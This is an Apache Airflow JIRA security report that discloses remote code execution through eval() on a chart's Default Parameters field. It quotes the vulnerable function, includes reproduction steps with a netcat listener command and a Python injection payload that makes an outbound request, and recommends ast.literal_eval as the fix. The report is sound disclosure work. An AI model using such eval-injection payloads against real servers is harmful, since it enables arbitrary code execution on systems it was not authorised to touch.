You are viewing a plain text version of this content. The canonical link for it is here.

Posted to commits@airflow.apache.org by "Rui Wang (JIRA)" <ji...@apache.org> on 2017/03/01 21:36:45 UTC

[jira] [Created] (AIRFLOW-933) Security - Airflow Use of Eval Allows for Remote Code Execution

Rui Wang created AIRFLOW-933:
--------------------------------

             Summary: Security - Airflow Use of Eval Allows for Remote Code Execution
                 Key: AIRFLOW-933
                 URL: https://issues.apache.org/jira/browse/AIRFLOW-933
             Project: Apache Airflow
          Issue Type: Bug
            Reporter: Rui Wang
            Assignee: Rui Wang


mpact: Any user with the ability to create or edit Charts may execute arbitrary code on the Airflow server.
Location: The Default Parameters form eld sent when saving a Chart located at /admin/chart/new/
Description: The Chart functionality allows for the definition of Default Parameters, which are baseline constraints for the values within a chart.
This data is user-controllable and passed directly to a Python eval, which will execute code:
def label_link(v, c, m, p): 
  try:
    default_params = eval(m.default_params) 
  except:
    default_params = {} 
  url = url_for(
    'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
    **default_params)
  return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))

Reproduction Steps:
1. Configure a local instance of Airflow, and start a local netcat listener with the following shell command: nc -l 1337.
2. Access Airflow as a user able to create or edit Charts.
3. Browse to /admin/chart/new to bring-up the UI for creating a Chart.
4. In its Default Parameters field, and enter-in the following example payload:
  (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read (), None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, __g))]][0])(globals())

5. Save the Chart, and observe that the application has made a network request to your listener, indicating that your code has executed.
Remediation: Use the Python method ast.literal_eval (https://docs.python.org/3/library/ast.html#ast.literal_eval) which safely parses its input, rather than executing it as code.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)